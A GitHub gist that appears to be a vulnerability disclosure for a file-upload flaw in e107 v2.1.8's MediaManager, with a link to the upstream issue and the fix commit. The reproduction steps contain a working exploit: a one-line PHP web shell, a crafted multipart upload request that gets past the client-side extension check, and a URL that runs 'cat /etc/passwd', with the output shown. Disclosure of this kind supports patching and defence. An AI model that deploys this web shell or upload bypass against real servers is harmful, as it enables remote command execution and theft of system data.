Skip to content

Instantly share code, notes, and snippets.

@ommadawn46

ommadawn46/e107_v2.1.8_MediaManager_bypass_filetype_check.md

Last active September 7, 2018 10:45
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ommadawn46/5cb22e7c66cc32a5c7734a8064b4d3f5 to your computer and use it in GitHub Desktop.
Save ommadawn46/5cb22e7c66cc32a5c7734a8064b4d3f5 to your computer and use it in GitHub Desktop.
Download ZIP
e107 v2.1.8 MediaManager bypass filetype check
Raw
e107_v2.1.8_MediaManager_bypass_filetype_check.md

Description

MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.

Reproduce

  1. Login to the admin page (/e107_admin/admin.php) and access MediaManager.

  2. Make a backdoor PHP file named "backdoor.jpg" to bypass JavaScript filter and select it on MediaManeger.

<?php system($_GET['q']) ?>

You can bypass the filetype check because it is filtered by only the extention.

  1. Start upload and rewrite the request body using BurpSuite as follows. On the server side, this file is accepted as a PHP file.
POST /e107/e107_web/js/plupload/upload.php?for=&path= HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2aneEcIB6Abe9JcJ
Cookie: my_cookie=********************
Connection: close
Content-Length: 503

------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="name"

backdoor.php
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary2aneEcIB6Abe9JcJ
Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: image/jpeg

<?php system($_GET['q']) ?>
------WebKitFormBoundary2aneEcIB6Abe9JcJ--
  1. After importing the uploaded file, the uploaded file is placed in a directory accessible without authentication. Access http://localhost/e107/e107_media/416f4602e3/files/2018-08/backdoor.php?q=cat%20/etc/passwd. The result of OS command execution is displayed.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false

Source Code

https://github.com/e107inc/e107/blob/604cda1f83f60c808067866e89bf93e2797f3ab5/e107_web/js/plupload/plupload.dev.js#L660-L671

Filetype check is processed by a filter on the client side. But, this check can easily be bypassed by rewriting the request.

Reference

e107inc/e107#3352

Solution

https://github.com/e107inc/e107/commit/e5bb5297f68e56537c004cdbb48a30892e9f6f4c

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment